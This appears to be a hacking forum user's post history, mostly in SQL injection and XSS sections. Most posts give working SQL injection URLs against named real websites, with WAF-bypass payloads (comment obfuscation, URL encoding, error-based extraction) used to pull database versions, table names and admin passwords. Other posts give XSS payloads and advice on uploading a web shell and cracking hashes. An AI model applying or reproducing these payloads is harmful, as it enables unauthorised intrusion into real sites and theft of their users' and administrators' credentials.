Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.

Results 1 - 30 of 38
8 months ago
hack2012
repeat post? onerror=alert(1);
Forum: XSS Info
8 months ago
hack2012
maybe you can onclick=alert(1);
Forum: XSS Info
8 months ago
hack2012
sorry, you can't ....
Forum: XSS Info
8 months ago
hack2012
thanks a lot!
Forum: XSS Info
8 months ago
hack2012
where is the url???
Forum: SQL and Code Injection
11 months ago
hack2012
http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16%23
Forum: SQL and Code Injection
11 months ago
hack2012
you can use URLencode to bypass it http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1,2,%61dmin_firstname,4,5,%61dmin_password,7+from+admin-- for more details, please visit: http://www.waitalone.cn/waf-bypass-the-url-encoding-method.html
Forum: SQL and Code Injection
11 months ago
hack2012
Yes, it is. http://www.wowsoc.org/devzone/?assigned=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Forum: CSRF and Session Info
11 months ago
hack2012
http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6 5.5.28-29.1 http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1 change 0,1 to 1,1 then you will find the diff
Forum: SQL and Code Injection
11 months ago
hack2012
http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database() Just use "concat" function
Forum: SQL and Code Injection
1 year ago
hack2012
where is the url?
Forum: CSRF and Session Info
1 year ago
hack2012
maybe it's not allowed to execute php in this folder ... upload the shell to another folder
Forum: SQL and Code Injection
1 year ago
hack2012
mysql encode ... http://www.cmd5.com/
Forum: SQL and Code Injection
1 year ago
hack2012
if you found it, and the root user does not deny your ip, you can link to it with a sql client.
Forum: SQL and Code Injection
1 year ago
hack2012
login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop user = c1bc_cp_dba@localhost it's not root, there is no file_priv to load_file or into outfile... so you must get the username and password from the admin table.
Forum: SQL and Code Injection
1 year ago
hack2012
Is the original poster Chinese?
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.aristocars.com.pk/Car.php?id=-250 /*!12346UnioN*/ all select 1,2,@@version
Forum: SQL and Code Injection
1 year ago
hack2012
http://sellbyowners.com.pk/property_view.php?cityid=66&city=Haripur&id=123' or+1+group+by+concat_ws(0x7e,@@version,floor(rand(0)*2))+having+min(0)+or+1%23
Forum: SQL and Code Injection
1 year ago
hack2012
thanks
Forum: Obfuscation
1 year ago
hack2012
Thanks, it's very useful for me !
Forum: Obfuscation
1 year ago
hack2012
Please read it again ... if you want to test csrf, you must know how the webserver adds a user or does the other operation, then you can make a webform ****** and so on. Maybe dvwa can help you!
Forum: CSRF and Session Info
1 year ago
hack2012
Good idea, Thanks ... anybody who wants to read more about CSRF: http://seclab.stanford.edu/websec/csrf/ Chinese version: http://www.waitalone.cn/csrf-cross-site-request-forgery-defense.html
Forum: CSRF and Session Info
1 year ago
hack2012
and extractvalue(1, concat(0x7e, (select @@version),0x7e)) and extractvalue(1, concat(0x7e, (select user()),0x7e))
Forum: SQL and Code Injection
1 year ago
hack2012
I am sorry .. https://www.rumo.com.br/sistema/adm/CodigoFonte.asp?path=/&arq=aux
Forum: SQL and Code Injection
1 year ago
hack2012
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12--+ 5.5.17 http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12--+ redc http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELEC
Forum: SQL and Code Injection
1 year ago
hack2012
on table users
Forum: SQL and Code Injection
1 year ago
hack2012
I want to try, can you send it to me???
Forum: SQL and Code Injection
1 year ago
hack2012
maybe you can try: -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user-- or -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--
Forum: SQL and Code Injection
1 year ago
hack2012
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/-- maybe ok, or you can give me the URL.....
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--
Forum: SQL and Code Injection